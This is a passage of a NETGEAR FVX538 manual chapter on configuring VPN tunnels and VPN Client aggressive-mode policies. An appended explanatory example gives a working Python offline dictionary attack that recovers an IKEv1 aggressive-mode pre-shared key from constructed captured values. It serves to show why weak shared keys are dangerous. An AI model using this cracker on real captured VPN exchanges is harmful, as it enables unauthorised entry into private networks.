Chapter 6 Virtual Private Networking

This chapter describes how to use the virtual private networking (VPN) features of the FVX538 VPN firewall. VPN tunnels provide secure, encrypted communications between your local network and a remote network or computer.

Tip: When using dual WAN port networks, use the VPN Wizard to configure the basic parameters and then edit the VPN and IKE Policy screens for the various VPN scenarios.

Dual WAN Port Systems

The dual WAN ports in the FVX538 VPN firewall can be configured for either rollover mode, for increased system reliability, or load balancing mode, for optimum bandwidth efficiency. The WAN mode you choose determines how the VPN features have to be configured.

Rollover vs. Load Balancing Mode

Refer to Virtual Private Networks (VPNs) on page B-10 for an overview of the IP addressing requirements for VPN in the two WAN modes.

Table 6-1. IP addressing requirements for VPNs in dual WAN port systems

Configuration                                                WAN IP address   Rollover Mode*    Load Balancing Mode
VPN Road Warrior (client-to-gateway)                         Fixed            FQDN required     Allowed (FQDN optional)
                                                             Dynamic          FQDN required     FQDN required
VPN Gateway-to-Gateway                                       Fixed            FQDN required     Allowed (FQDN optional)
                                                             Dynamic          FQDN required     FQDN required
VPN Telecommuter (client-to-gateway through a NAT router)    Fixed            FQDN required     Allowed (FQDN optional)
                                                             Dynamic          FQDN required     FQDN required

*. All tunnels must be re-established after a rollover using the new WAN IP address.
Figure 6-1 shows the setup screens for the selected WAN mode. This setup is accomplished in Step 4: Configure the WAN Mode (Required for Dual WAN) on page 3-8.

Figure 6-1: Rollover Mode Setup Screen and Load Balancing Mode Setup Screen

Fully Qualified Domain Names

The use of fully qualified domain names is:
- Mandatory when the WAN ports are in rollover mode (Figure 6-2 on page 6-3). The FQDN is also what lets the VPN tunnels fail over: after a rollover the remote peer re-establishes the tunnel by resolving the FQDN to the new WAN IP address.
- Mandatory when the WAN ports are in load balancing mode and the IP addresses are dynamic (Figure 6-3 on page 6-4).
- Optional when the WAN ports are in load balancing mode and the IP addresses are static (Figure 6-3 on page 6-4).
See Step 5: Configure Dynamic DNS (If Needed) on page 3-11 for how to select and configure the Dynamic DNS service.

Figure 6-2: FVX538 functional block diagram in rollover mode. Rollover Control switches between the WAN 1 port and the WAN 2 port; an FQDN is required, and the single Dynamic DNS screen uses the same FQDN setup for BOTH WAN ports (select the Dynamic DNS service once).
Figure 6-3: FVX538 functional block diagram in load balancing mode. Load Balancing Control uses the WAN 1 port and the WAN 2 port together; an FQDN is required with dynamic IP addresses and optional with static IP addresses. There are two Dynamic DNS screens, one with the FQDN setup and Dynamic DNS service selection for the WAN1 port and one for the WAN2 port.
Creating a VPN Connection: Between FVX538 and FVS338

This section describes how to configure a VPN connection between a NETGEAR FVX538 VPN Firewall and a NETGEAR FVS338 VPN Firewall. Using each firewall's VPN Wizard, we will create a set of policies (IKE and VPN) that will allow the two firewalls to connect from locations with fixed IP addresses. Either firewall can initiate the connection.

This procedure was developed and tested using:
- NETGEAR FVX538 VPN Firewall with version 1.6.11 firmware; WAN1 IP address 10.1.0.118; LAN IP address 192.168.1.1, subnet mask 255.255.255.0
- NETGEAR FVS338 VPN Firewall with version 1.6.7 firmware; WAN IP address 10.1.1.150; LAN IP address 192.168.2.1, subnet mask 255.255.255.0

Configuring the FVX538
1. Select the VPN Wizard.
2. Give the connection a name, such as to_fvs.
3. Enter a value for the pre-shared key.
4. Click Next.
5. Enter the WAN IP address of the remote FVS338 (10.1.1.150 in this example).

Figure 6-4
6. Click WAN1 to bind this connection to the WAN1 port.
7. Click Next.
8. Enter the LAN IP address and subnet mask of the remote FVS338 (192.168.2.1 255.255.255.0 in this example).
9. Click Next.
10. Click Done to create the to_fvs IKE and VPN policies.

Figure 6-5

In the IKE Policies menu, the to_fvs IKE policy will appear in the table.

Figure 6-6

Figure 6-7
11. You can view the IKE parameters by selecting to_fvs and clicking Edit. It should not be necessary to make any changes.

Note: When X Authentication (XAUTH) is enabled, incoming VPN connections are authenticated against the FVX538 user database first, then, if configured, a RADIUS server is checked.

12. In the VPN Policies menu, the to_fvs VPN policy appears in the table.

Figure 6-8

Figure 6-9
13. You can view the VPN parameters by selecting to_fvs and clicking Edit. It should not be necessary to make any changes.

Figure 6-10
14. You can view the IKE parameters by selecting to_fvs and clicking Edit. It should not be necessary to make any changes.

Figure 6-11

Configuring the FVS338
1. Select the VPN Wizard.
2. Give the connection a name, such as to_fvx.
3. Enter the pre-shared key. It must be the same value you entered on the FVX538.
4. Select 'a remote VPN gateway'.
5. Click Next.

Figure 6-12
6. Enter the WAN IP address of the remote FVX538 (10.1.0.118 in this example).
7. Click Next.
8. Enter the LAN IP address and subnet mask of the remote FVX538 (192.168.1.1 255.255.255.0 in this example).
9. Click Next.
10. Click Done to create the to_fvx IKE and VPN policies.

Figure 6-13

Figure 6-14

Testing the Connection
1. From a PC on either firewall's LAN, try to ping a PC on the other firewall's LAN. Establishing the VPN connection may take several seconds.
2. For additional status and troubleshooting information, view the VPN log and status menu in the FVX538 or FVS338.

Creating a VPN Connection: Netgear VPN Client to FVX538

This section describes how to configure a VPN connection between a Windows PC and the FVX538 VPN firewall. Using the FVX538's VPN Wizard, we will create a single set of policies (IKE and VPN) that will allow up to 50 remote PCs to connect from locations in which their IP addresses are unknown in advance. The PCs may be directly connected to the Internet or may be behind NAT routers. If more PCs are to be connected, an additional policy or policies must be created. Each PC will use Netgear's VPN Client. Since the PC's IP address is assumed to be unknown, the PC must always be the initiator of the connection.
This procedure was developed and tested using:
- NETGEAR FVX538 ProSafe VPN Firewall 200 with version 1.6.11 firmware
- NETGEAR VPN Client version 10.3.5 (Build 6)
- NAT router: NETGEAR FR114P with version 1.5_09 firmware

Configuring the FVX538
1. Select the VPN Wizard.
2. Give the client connection a name, such as home.
3. Enter a value for the pre-shared key.
4. Select 'a remote VPN client'.

Figure 6-15

5. Click Next to go to the summary page.
6. Click Done to create the 'home' IKE and VPN policies.
Configuring the VPN Client

Right-click on the VPN client icon in your Windows toolbar and select the Security Policy Editor. In the upper left of the Policy Editor window, click the New Document icon to open a New Connection. Then:
1. Give the New Connection a name, such as to_fvs.
2. In the Remote Party Identity section, select ID Type of IP Subnet.
3. Enter the LAN IP Subnet Address and Subnet Mask of the FVX538's LAN.
4. Select Connect using Secure Gateway Tunnel.
5. Under ID Type, select Domain Name and Gateway IP Address.

Figure 6-16

Figure 6-17
6. For Domain Name, enter fvs_local.com and enter the WAN IP Address of the FVX538.
7. In the left frame, click on My Identity.
8. Select Certificate = None.
9. Under ID Type, select Domain Name.

Figure 6-18

The value entered under Domain Name will be of the form <name><xy>.fvs_remote.com, where each user must use a different variation on the Domain Name entered here. The <name> is the policy name used in the FVX538 configuration; in this example, it is home. X and Y are an arbitrary pair of numbers chosen for each user, and the FVX538 uses this identity to tell the users of the policy apart.

Note: X may not be zero!
In this example, we have entered home11.fvs_remote.com. Up to 50 user variations can be served by one policy.
10. Leave Virtual Adapter disabled, and select your computer's Network Adapter. Your current IP address will appear.
11. Before leaving the My Identity menu, click the Pre-Shared Key button.
12. Click Enter Key, type your pre-shared key, and click OK. This key will be shared by all users of the FVX538 policy home, so it cannot be changed or revoked for one user without changing it for every user of the policy.

Figure 6-19

Figure 6-20
13. In the left frame, click on Security Policy.
14. Select Phase 1 Negotiation Mode = Aggressive Mode. PFS should be disabled, and Replay Detection should be enabled. Aggressive mode is required here because the client is identified by its Domain Name rather than by a fixed IP address that the FVX538 could use to look up the key; the trade-off is that aggressive mode sends the identities and the pre-shared-key authentication hash unencrypted, so the key shared by all users of the policy should be long and random enough to resist offline guessing.

Figure 6-21

15. In the left frame, expand Authentication and select Proposal 1. Compare with the figure to the right. No changes should be necessary.

Figure 6-22

16. In the left frame, expand Key Exchange and select Proposal 1. Compare with the figure to the right. No changes should be necessary.
17. In the upper left of the window, click the disk icon to save the policy.

Figure 6-23

Testing the Connection
1. Right-click on the VPN client icon in your Windows toolbar and select Connect..., then My Connections\to_FVS. Within 30 seconds you should receive the message "Successfully connected to My Connections\to_FVS" and the VPN client icon in the toolbar should say On.
2. For additional status and troubleshooting information, right-click on the VPN client icon in your Windows toolbar and select Connection Monitor or Log Viewer, or view the VPN log and status menu in the FVX538.

Figure 6-24
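The following is an added example, not part of this manual and not NETGEAR code, written to show why the Aggressive Mode setting chosen in step 14 makes the strength of the key entered in step 12 matter so much. It implements the pre-shared-key authentication hash HASH_R from RFC 2409 section 5.4, which the responder sends unencrypted in the second aggressive-mode message, and then recomputes it for each entry of a wordlist, exactly as an eavesdropper holding a capture of the exchange could do offline. It assumes HMAC-SHA1 as the PRF (the chapter does not show which hash Proposal 1 negotiates); the cookies, nonces, Diffie-Hellman values, SA payload bytes, wordlist and the weak key netgear1 are all constructed for the example, and the identity fvs_local.com is the gateway Domain Name from step 6.

```python
"""Offline check of an IKEv1 aggressive-mode pre-shared key.

Added example, not NETGEAR code. Implements the pre-shared-key
authentication hash of RFC 2409 section 5.4 with HMAC-SHA1 as the PRF
(assumed; the page does not show Proposal 1's hash algorithm). All byte
strings in CAPTURE are constructed and much shorter than real IKE values.
"""
import hashlib
import hmac
from typing import Iterable, Optional

ID_FQDN = 2  # RFC 2407 identification type for a domain-name identity


def id_body(id_type: int, data: bytes, proto: int = 0, port: int = 0) -> bytes:
    """ISAKMP identification payload body: type, protocol, port, then the ID data."""
    return bytes([id_type, proto]) + port.to_bytes(2, "big") + data


def skeyid_psk(psk: bytes, ni: bytes, nr: bytes) -> bytes:
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b)"""
    return hmac.new(psk, ni + nr, hashlib.sha1).digest()


def hash_r(psk: bytes, cap: dict) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)

    This is what the responder (the FVX538 in the page's client setup) puts
    in message 2 of aggressive mode. Every input except the PSK travels in
    the clear: message 1 carries SAi_b, g^xi, Ni and IDii; message 2 carries
    g^xr, Nr, IDir and HASH_R itself.
    """
    key = skeyid_psk(psk, cap["ni"], cap["nr"])
    data = (cap["gxr"] + cap["gxi"] + cap["cky_r"] + cap["cky_i"]
            + cap["sai_b"] + cap["idir_b"])
    return hmac.new(key, data, hashlib.sha1).digest()


# Constructed capture of one exchange. Placeholder lengths: real DH group 2
# public values are 128 bytes, cookies 8 bytes, nonces 8 to 256 bytes.
CAPTURE = {
    "cky_i": bytes.fromhex("1122334455667788"),
    "cky_r": bytes.fromhex("99aabbccddeeff00"),
    # SA payload body: DOI 1 (IPsec), situation 1, one proposal, one transform
    # with illustrative attributes (3DES, SHA, PSK auth, DH group 2, 28800 s).
    "sai_b": bytes.fromhex(
        "0000000100000001" "0000002401010001" "0000001c01010000"
        "800b0001800c708080010005800200028003000180040002"),
    "gxi": bytes.fromhex("0102030405060708090a0b0c0d0e0f10"),
    "gxr": bytes.fromhex("f0e1d2c3b4a5968778695a4b3c2d1e0f"),
    "ni": bytes.fromhex("c0ffee00c0ffee00c0ffee00c0ffee00"),
    "nr": bytes.fromhex("deadbeefdeadbeefdeadbeefdeadbeef"),
    "idir_b": id_body(ID_FQDN, b"fvs_local.com"),  # gateway identity from step 6
}

WEAK_PSK = b"netgear1"                       # constructed weak key for the demo
OBSERVED_HASH_R = hash_r(WEAK_PSK, CAPTURE)  # what a sniffer reads from message 2
WORDLIST = [b"password", b"12345678", b"netgear", b"fvx538", b"netgear1"]


def crack_psk(cap: dict, observed: bytes, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: recompute HASH_R for each candidate key.

    Nothing is sent to the gateway, so its VPN log never records the attempts.
    Returns the matching key, or None if no candidate reproduces the hash.
    """
    for psk in candidates:
        if hmac.compare_digest(hash_r(psk, cap), observed):
            return psk
    return None


if __name__ == "__main__":
    print("recovered PSK:", crack_psk(CAPTURE, OBSERVED_HASH_R, WORDLIST))
```

Run stand-alone it prints the recovered key. The contrast with main mode is the point: there the identity and hash payloads are encrypted under keys derived from the Diffie-Hellman exchange, so a passive capture gives an attacker nothing to test guesses against. Aggressive mode gives that up so that a client with an unknown address can be identified by FQDN before any key is known, which is exactly the page's scenario, and from then on the unguessability of the key shared by all users of the policy is what protects the tunnel.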